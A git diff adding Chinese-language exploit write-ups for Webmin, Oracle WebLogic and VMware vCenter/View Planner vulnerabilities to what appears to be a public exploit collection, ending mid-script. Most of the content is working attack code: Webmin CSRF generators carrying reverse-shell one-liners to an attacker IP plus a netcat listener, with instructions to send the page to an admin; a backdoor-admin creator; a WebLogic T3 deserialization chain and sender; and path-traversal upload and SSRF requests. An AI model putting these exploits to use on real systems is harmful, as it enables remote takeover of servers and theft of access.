diff --git a/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md b/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
index 1bc98a3..2f5a6cb 100644
--- a/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
+++ b/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
@@ -4,6 +4,11 @@
ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞
+参考链接:
+
+- https://srcincite.io/advisories/src-2021-0015/
+- https://nvd.nist.gov/vuln/detail/CVE-2021-32605
+
## 漏洞影响
```
diff --git a/README.md b/README.md
index c903d7e..f3e085d 100644
--- a/README.md
+++ b/README.md
@@ -287,6 +287,7 @@
* Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107
* Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
* Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
+ * Webmin 多个高危漏洞 CVE-2021-31760~62
* WiseGiga NAS down_data.php 任意文件下载漏洞
* WiseGiga NAS group.php 远程命令执行漏洞
* WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464
@@ -434,6 +435,7 @@
* PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
* Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
* WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
+ * Weblogic Server远程代码执行漏洞 CVE-2020-14756
* Weblogic SSRF漏洞 CVE-2014-4210
* WebLogic T3 反序列化漏洞 CVE-2016-3510
* Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
@@ -500,16 +502,23 @@
* Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
* SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
* Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
+ * VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
+ * VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
* VMware vCenter 任意文件读取漏洞
+ * VMware View Planner 未授权RCE CVE-2021-21978
* VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
* VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
* VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
+ * Wazuh Manager 代码执行漏洞 CVE-2021-26814
* Windows Chrome 远程命令执行漏洞
* WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
* WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
* WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
+ * WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
+ * WordPress File Manager<6.9 RCE CVE-2020-25213
* WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
* WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
+ * WordPress SuperForms 4.9 任意文件上传到远程代码执行
* WordPress WP_Query SQL 注入漏洞 CVE-2022-21661
* 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
- 网络设备漏洞
diff --git a/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
new file mode 100644
index 0000000..5d53277
--- /dev/null
+++ b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
@@ -0,0 +1,486 @@
+# Webmin 多个高危漏洞 CVE-2021-31760~62
+
+## 漏洞描述
+
+CVE-2021-31760:利用CSRF攻击,实现对Webmin的远程命令执行。
+
+CVE-2021-31761:利用XSS攻击,实现对Webmin的远程命令执行。
+
+CVE-2021-31762:利用CSRF攻击,通过Webmin的添加用户功能创建特权用户,然后通过特权用户权限反弹shell。
+
+参考链接:
+
+- CVE-2021-31760:https://github.com/electronicbots/CVE-2021-31760
+- CVE-2021-31761:https://github.com/electronicbots/CVE-2021-31761
+- CVE-2021-31762:https://github.com/electronicbots/CVE-2021-31762
+
+## 漏洞影响
+
+```
+Webmin <= 1.973
+```
+
+## FOFA
+
+```
+app="Webmin"
+```
+
+## 漏洞复现
+
+CVE-2021-31760 poc:
+
+```python
+import time, subprocess,random
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'proc/run.cgi'
+else:
+ target = target + '/proc/run.cgi'
+
+ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
+
+port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
+
+ReverseShell = input \
+('''\033[1;37m
+\n
+1- Bash Reverse Shell \n
+2- PHP Reverse Shell \n
+3- Python Reverse Shell \n
+4- Perl Reverse Shell \n
+5- Ruby Reverse Shell \n
+\033[1;m
+
+\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
+
+file_name = random.randrange(1000)
+
+if ReverseShell == '1':
+ ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
+
+elif ReverseShell == '2':
+ ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
+
+elif ReverseShell == '3':
+ ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
+
+elif ReverseShell == '4':
+ ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
+
+elif ReverseShell == '5':
+ ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
+
+else:
+ print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
+
+
+def CSRF_Generator():
+ with open('CSRF_POC.html', 'w') as POC:
+ POC.write \
+ ('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+ POC.close()
+
+ print(
+ "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
+
+
+def Netcat_listener():
+ print()
+ subprocess.run(["nc", "-nlvp "+port+""])
+
+
+def main():
+ CSRF_Generator()
+ Netcat_listener()
+
+
+if __name__ == '__main__':
+ main()
+```
+
+CVE-2021-31761 poc:
+
+```python
+import time, subprocess,random,urllib.parse
+
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'tunnel/link.cgi/'
+else:
+ target = target + '/tunnel/link.cgi/'
+
+ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
+
+port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
+
+ReverseShell = input \
+('''\033[1;37m
+\n
+1- Bash Reverse Shell \n
+2- PHP Reverse Shell \n
+3- Python Reverse Shell \n
+4- Perl Reverse Shell \n
+5- Ruby Reverse Shell \n
+\033[1;m
+
+\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
+
+file_name = random.randrange(1000)
+
+if ReverseShell == '1':
+ ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
+
+elif ReverseShell == '2':
+ ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
+
+elif ReverseShell == '3':
+ ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
+
+elif ReverseShell == '4':
+ ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
+
+elif ReverseShell == '5':
+ ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
+
+else:
+ print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
+
+
+def CSRF_Generator():
+ Payload = urllib.parse.quote('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+
+ print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
+
+ print(target+Payload)
+
+def Netcat_listener():
+ print()
+ subprocess.run(["nc", "-nlvp "+port+""])
+
+
+def main():
+ CSRF_Generator()
+ Netcat_listener()
+
+
+if __name__ == '__main__':
+ main()
+```
+
+CVE-2021-31762 poc:
+
+```python
+import time
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'acl/save_user.cgi'
+else:
+ target = target + '/acl/save_user.cgi'
+
+
+def CSRF_Generator():
+ with open('CSRF_POC.html', 'w') as POC:
+ POC.write \
+ ('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+ POC.close()
+
+ print(
+ "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
+
+
+
+def main():
+ CSRF_Generator()
+
+
+if __name__ == '__main__':
+ main()
+```
+
diff --git a/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md b/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md
new file mode 100644
index 0000000..e0aedf8
--- /dev/null
+++ b/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md
@@ -0,0 +1,116 @@
+# Weblogic Server 远程代码执行漏洞 CVE-2020-14756
+
+## 漏洞描述
+
+weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞,weblogic针对该漏洞的解决方案就是不断填充黑名单,在高版本jdk下配合jep290机制实现黑名单,在低版本下配合resolveClass进行防御,所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。
+
+CVE-2020-14756 这个漏洞的利用比较巧妙,通过利用weblogic coherence组件中的类,绕过了黑名单机制的检测,重新能够利用黑名单中的类,造成代码执行。
+
+参考链接:
+
+- https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW
+- https://github.com/Y4er/CVE-2020-14756
+
+## 漏洞影响
+
+```
+Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
+```
+
+## 漏洞复现
+
+CVE_2020_14756.java:
+
+```
+package com.supeream;
+
+import com.supeream.serial.Serializables;
+import com.supeream.weblogic.T3ProtocolOperation;
+// coherence-rest.jar
+import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
+// coherence-web.jar
+import com.tangosol.coherence.servlet.AttributeHolder;
+// coherence.jar
+import com.tangosol.util.SortedBag;
+import com.tangosol.util.aggregator.TopNAggregator;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+public class CVE_2020_14756 {
+ public static void main(String[] args) {
+ MvelExtractor extractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\"calc\");");
+ MvelExtractor extractor2 = new MvelExtractor("");
+
+ try {
+ SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2);
+ AttributeHolder attributeHolder = new AttributeHolder();
+ sortedBag.add(1);
+
+ Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
+ m_comparator.setAccessible(true);
+ m_comparator.set(sortedBag, extractor);
+
+ Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
+ setInternalValue.setAccessible(true);
+ setInternalValue.invoke(attributeHolder, sortedBag);
+ /*
+ FileOutputStream fileOutputStream = new FileOutputStream(new File("test.ser"));
+ ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
+ objectOutputStream.writeObject(attributeHolder);
+ */
+ T3ProtocolOperation.send("192.168.65.128", "7001", Serializables.serialize(attributeHolder));
+
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
+```
+
+weblogic_t3.py:
+
+```py
+#!/usr/bin/python
+import socket
+import os
+import sys
+import struct
+
+if len(sys.argv) < 3:
+ print 'Usage: python %s ' % os.path.basename(sys.argv[0])
+ sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(5)
+
+server_address = (sys.argv[1], int(sys.argv[2]))
+print '[+] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print 'sending "%s"' % headers
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+payloadObj = open(sys.argv[3],'rb').read()
+
+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload=payload+payloadObj
+payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+# adjust header for appropriate message length
+payload=struct.pack('>I',len(payload)) + payload[4:]
+
+print '[+] Sending payload...'
+sock.send(payload)
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+```
+
diff --git a/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md b/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md
new file mode 100644
index 0000000..0647c57
--- /dev/null
+++ b/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md
@@ -0,0 +1,35 @@
+# VMware View Planner 未授权RCE CVE-2021-21978
+
+## 漏洞描述
+
+输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件,从而导致在logupload容器中远程执行代码。
+
+参考链接:
+
+- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
+
+## 漏洞复现
+
+poc:
+
+```
+POST /logupload?logMetaData={"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}
+
+Accept-Encoding:gzip,deflate
+Content-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD
+
+
+------WebKitFormBoundaryH8GoragzRFVTw1VD
+Content-Disposition:form-data;name="logfile";filename=""
+Content-Type:text/plain
+
+#! /usr/bin/env python3
+import cgi
+import os,sys
+import logging
+import jsom
+
+....
+```
+
+
\ No newline at end of file
diff --git a/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md b/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md
new file mode 100644
index 0000000..0c9c973
--- /dev/null
+++ b/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md
@@ -0,0 +1,33 @@
+# VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
+
+## 漏洞描述
+
+VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。
+
+参考链接:
+
+* https://kb.vmware.com/s/article/82374
+* https://twitter.com/osama_hroot/status/1365586206982082560
+
+## 漏洞影响
+
+```
+vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0
+Cloud Foundation: before 3.10.1.2, 4.2
+```
+
+## 漏洞复现
+
+poc:
+
+```
+GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
+HOST:
+vcIP: SSRF
+vcUsername:sa
+vaPassword:sa
+reqResource:sa
+...
+```
+
+
\ No newline at end of file
diff --git a/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md b/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md
new file mode 100644
index 0000000..665b5a9
--- /dev/null
+++ b/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md
@@ -0,0 +1,162 @@
+# VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
+
+## 漏洞描述
+
+由于对 vSphere vCenter Server中用户提供的输入的验证不足,因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。
+
+参考链接:
+
+- https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/
+- https://swarm.ptsecurity.com/unauth-rce-vmware/
+- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
+
+## 漏洞影响
+
+```
+VMware vCenter Server 7.0系列 < 7.0.U1c
+VMware vCenter Server 6.7系列 < 6.7.U3l
+VMware vCenter Server 6.5系列 < 6.5 U3n
+```
+
+## FOFA
+
+```
+app="vmware-vCenter"
+```
+
+## 漏洞复现
+
+漏洞路径:
+
+```
+https://target/ui/vropspluginui/rest/services/uploadova
+POST: name="uploadFile"; filename="xxx.tar"
+```
+
+构造POST包上传tar文件:
+
+
+
+Linux可以直接创建../../home/vsphere-ui/.ssh/authorized_keys TAR文件 后直接SSH连;Windows可以直接写入webshell。
+
+批量检测脚本:
+
+- https://raw.githubusercontent.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/main/CVE-2021-21972.py
+
+```python
+#-*- coding:utf-8 -*-
+banner = """
+ 888888ba dP
+ 88 `8b 88
+ a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
+ 88 `8b. 88' `88 88 Y8ooooo. 88 88
+ 88 .88 88. .88 88 88 88. .88
+ 88888888P `88888P8 dP `88888P' `88888P'
+ ooooooooooooooooooooooooooooooooooooooooooooooooooooo
+ @time:2021/02/25 CVE-2021-21972.py
+ C0de by NebulabdSec - @batsu
+ """
+print(banner)
+
+import threadpool
+import random
+import argparse
+import http.client
+import urllib3
+import base64
+import requests
+
+
